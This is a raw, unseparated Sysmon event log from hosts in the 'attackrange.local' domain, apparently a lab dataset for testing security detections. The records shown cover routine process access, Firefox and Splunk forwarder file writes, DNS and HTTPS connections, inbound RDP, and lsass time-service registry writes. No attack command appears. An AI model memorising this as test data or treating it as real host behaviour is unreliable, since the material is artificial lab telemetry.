09:16:55.246{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.246{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C07-6151-5B7A-00000000FC01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.245{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C07-6151-5B7A-00000000FC01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.231{5EBD8912-8C07-6151-5B7A-00000000FC01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.229{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB1BF63E177B4BC63061A99AAB58A19,SHA256=D7DAC8C55BF3651EBC2147A923D549278DA40B0DFEF3F0C8B55D9651F19588D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.234{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53442-false104.17.33.82-443https 354300x80000000000000001051344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.232{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52010- 354300x80000000000000001051343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.134{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-65348- 354300x80000000000000001051342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.109{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65348- 354300x80000000000000001051341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:52.179{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59289-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.047{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-walMD5=18425A23B1CFC5FCE9279CD29F18C6F7,SHA256=2B1731F7E7E3B9F0E19010648062F0C5D35189B10CCEB384026DDD6E98F37445,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.046{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.046{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-shmMD5=7C6200E734EB59364E142B4D985CACF6,SHA256=8CD6337A25D730A8F79CEF8433DC44DC9218AA10658E8B32D65184275A1D2E41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.046{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.040{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++www.google.com\ls\data.sqlite-journalMD5=A0FD06894FB605BCCE6D4F6329F5FECB,SHA256=7414B759842883BD53C9DE0E374AE382DB0CC27FC543E7D8A0971506BCB79F12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.020{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++www.google.com\ls\usageMD5=7EBC49C6814A5E95081FAF4551CFE5BE,SHA256=EEB1ECA839038A28B6B37735E0A2D15131A9000246988759611B1704B78B2B9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979869Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:56.615{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C1F9058603805ED0AAE6450BB28D4F,SHA256=C6D31084215F47366F8CF12F120868DECB0060CD4CE6871F9F2FA8E59733C6ED,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001051399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.487{5EBD8912-7B3A-6151-3A78-00000000FC01}7120server.ethicalads.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.480{5EBD8912-7B3A-6151-3A78-00000000FC01}7120server.ethicalads.io052.247.10.118;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.479{5EBD8912-7B3A-6151-3A78-00000000FC01}7120server.ethicalads.io0::ffff:52.247.10.118;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:56.306{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE55ACC2BE3001C2E5680F378D2F20E7,SHA256=10CF4D8F5F852799CD5A607F16496F3C8D56D595D5610F98A61C854B6F190528,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:56.302{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CB233A7FE78B683256B025B993755FE,SHA256=1FF4D140C8F7C1B194F2420560DD17E7F1C0F77C05625B28FF6F565079372C63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.586{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51182- 354300x80000000000000001051393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.586{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53823- 354300x80000000000000001051392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.260{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53450-false52.247.10.118-443https 354300x80000000000000001051391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.169{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55284- 354300x80000000000000001051390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.139{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local56566-false104.21.22.233-443https 354300x80000000000000001051389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.038{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local56565-false172.67.221.13-443https 354300x80000000000000001051388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.996{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53449-false172.67.221.13-443https 354300x80000000000000001051387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.993{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56564- 10341000x80000000000000001051386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:56.123{5EBD8912-8C07-6151-5C7A-00000000FC01}54246872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979870Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:57.630{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8783D7A712AC971FDE8ED9EE51DE04FE,SHA256=D32313F1FB872AEB1E63B2104FBC76B645BD79E5720D03DD9931CDCC1FFF61C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:57.316{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37D9A414037D53118DAE5373CCC14107,SHA256=26032CE86DEEBE93A2B9BFB93325562132FA911B21D11990BDBBE8F23440073E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.050{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63658-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.686{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53452-false142.250.184.238fra24s12-in-f14.1e100.net443https 354300x80000000000000001051401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.686{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53451-false142.250.184.238fra24s12-in-f14.1e100.net443https 23542300x80000000000000001051400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:57.081{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=1A542A4F5599B75E06A935B7BCEC1015,SHA256=56F9742F38727E6625B54679B834334D6C1F0707F061D71108C5F3C98109F54A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979871Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:58.646{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1A5E16A13253566B93480C72AB67739,SHA256=9196A167D60B88728AE9E2A163714CEB5D7465179DB778F3088A2F662C4C3D47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.663{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-49859- 354300x80000000000000001051407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.637{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49859- 354300x80000000000000001051406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.637{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65049- 23542300x80000000000000001051405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:58.325{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09ECB6E85BD7B023B2C088594DA92C5A,SHA256=B7898CCDA88FE9CAA45B9DD1A2874C4ADD71CB5B153C1741A0B6B0059876D114,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000979883Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000979882Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fd2ec02) 13241300x8000000000000000979881Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0x0afd5002) 13241300x8000000000000000979880Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b380-0x6cc1b802) 13241300x8000000000000000979879Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0xce862002) 13241300x8000000000000000979878Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000979877Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fd2ec02) 13241300x8000000000000000979876Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0x0afd5002) 13241300x8000000000000000979875Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b380-0x6cc1b802) 13241300x8000000000000000979874Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:16:59.865{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b388-0xce862002) 354300x8000000000000000979873Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:56.677{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59445-false10.0.1.12-8000- 23542300x8000000000000000979872Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:59.646{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2007D077D195FD3112E6E2F9929EAD3A,SHA256=4F0CEAE1E7429098369DD44851714040564FF2D0E1B8800C2EE22696A55E2FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.494{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3261519EB64FEDB20B9DC52C9D9A756C,SHA256=4EDC3DDCCC3C6D83C8F8FBE1E844B3ABD0E4F3E05BBACCD3F3C578A0A9A08999,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.410{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:57.352{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62569-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.332{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=068327A1EDE0D2FEF2961BFF3E31B569,SHA256=9B8478362844982D8D3E6E263CD0817E93C853B2680576FF0487C1BFA457D83A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.124{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla 